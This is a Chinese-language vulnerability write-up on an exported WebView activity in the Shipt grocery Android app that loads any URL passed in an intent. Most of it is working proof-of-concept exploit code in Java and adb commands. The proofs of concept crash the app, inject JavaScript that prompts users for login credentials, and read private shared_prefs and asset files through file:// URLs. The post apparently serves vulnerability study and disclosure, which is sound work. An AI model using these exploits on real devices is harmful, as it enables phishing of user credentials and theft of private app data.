漏洞学习|攻击导出的WebView Activity
漏洞描述
com.pushio.manager.iam.ui.PushIOMessageViewActivity已将导出设置为 true 使该活动容易受到攻击。
代码语言:javascript复制<activity android:name="com.pushio.manager.iam.ui.PushIOMessageViewActivity" android:theme="@android:style/Theme.Translucent.NoTitleBar">
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:scheme="@string/responsys_api_key"/>
</intent-filter>
</activity>
com.pushio.manager.iam.ui.PushIOMessageViewActivity允许与WebView交互的类中的一个问题:
代码语言:javascript复制rotected void onStart() {
...
Bundle extras = getIntent().getExtras();
PIOLogger.d("PIOMVA oS extras: " extras);
if (extras != null) {
final String content = extras.getString(Param.CONTENT);
final String url = extras.getString("url");
String viewType = extras.getString("type");
...
if (TextUtils.isEmpty(viewType)) {
PIOLogger.w("PIOMVA oS view type not found, closing window...");
finish();
return;
} else if (viewType.equalsIgnoreCase(PushIOMessageViewType.ALERT.toString())) {
...
public void run() {
try {
if (PushIOMessageViewActivity.this.mActivityWeakReference != null && PushIOMessageViewActivity.this.mActivityWeakReference.get() != null && !((Activity) PushIOMessageViewActivity.this.mActivityWeakReference.get()).isFinishing()) {
PushIOMessageViewActivity.this.mPopupWindow.showAtLocation(PushIOMessageViewActivity.this.mParentLayout, 17, 0, 0);
if (!TextUtils.isEmpty(content)) {
PushIOMessageViewActivity.this.mWebView.loadDataWithBaseURL(null, content, "text/html", "utf-8", null);
} else if (TextUtils.isEmpty(url)) {
PushIOMessageViewActivity.this.finish();
} else {
PushIOMessageViewActivity.this.mWebView.loadUrl(url);//load custom url
}
}
} catch (BadTokenException e) {
PIOLogger.d("PIOMVA oSt " e.getMessage());
}
借助特殊意图,可以传递if块并加载您自己的 URL 地址或 Javascript。 看上面代码走到else就可以加载任意url且没有做任何限制。
代码语言:javascript复制PushIOMessageViewActivity.this.mWebView.loadUrl(url);//load custom url
您可以通过控制台 adb 或通过我的应用程序 HunterExploit 利用此漏洞 PoC 1 - 终止进程 - 允许停止shipt进程 - 信息可用性的威胁 Java PoC:
代码语言:javascript复制Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "chrome://crash");
intent.putExtra("type", "alert");
startActivity(intent);
ADB Poc: adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a “android.intent.action.VIEW” –es “url” “chrome://crash” –es “type” “alert”
PoC 2 - XSS - 允许网络钓鱼攻击 Java PoC: 可以在应用内打开钓鱼网站的链接
代码语言:javascript复制Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
intent.putExtra("url", "javascript:{var Login = window.prompt("Authorization: Login", "Input Login");var Password = window.prompt("Authorization: Password", "Input Password"); alert('Interception of data: ' Login ' ' Password)}");
intent.putExtra("type", "alert");
Intent intentStart = new Intent(Intent.ACTION_MAIN);
intentStart.setComponent(new ComponentName("com.shipt.groceries", "com.shipt.groceries.MainActivity"));
startActivity(intentStart);
try {
Thread.sleep(10000);
} catch (InterruptedException e) {
e.printStackTrace();
}
startActivity(intent);
ADB PoC: adb shell am start -n com.shipt.groceries/com.shipt.groceries.MainActivity Wait for the application to load, and then run the following command adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a “android.intent.action.VIEW” –es “url” “javascript:{window.prompt('Authorization:Login','Input_Login');window.prompt('Authorization:Password','Input_Password')}” –es “type” “alert” PoC 3 - LFI - 允许您在没有 root 访问权限的情况下读取机密用户文件 - 信息机密性 Java PoC 的威胁: 访问应用内沙箱文件,如果登录信息明文存储在shared_prefs里也可用于窃取登录信息
代码语言:javascript复制Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "file:///data/data/com.shipt.groceries/shared_prefs/pushio_store.xml");
intent.putExtra("type", "alert");
startActivity(intent);
ADB PoC: adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a “android.intent.action.VIEW” –es “url” “file:///data/data/com.shipt.groceries/shared_prefs/pushio_store.xml” –es “type” “alert” PoC 4 - 读取文件或加载android_asset Java PoC: 加载本地html可用于xss攻击
代码语言:javascript复制Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "file:///android_asset/www/index.html");
intent.putExtra("type", "alert");
startActivity(intent);
ADB PoC: adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a “android.intent.action.VIEW” –es “url” “file:///android_asset/www/index.html” –es “type” “alert”
影响
- 攻击者可以通过欺骗用户的信任来在 Shipt 应用程序中加载 JavaScript。
- 无需 root 访问权限即可读取用户的个人文件。
- 破坏Shipt进程。
- 从 android_asset 文件中读取应用程序文件。
- 对 WebView 的访问为攻击者提供了许多可能的利用机会。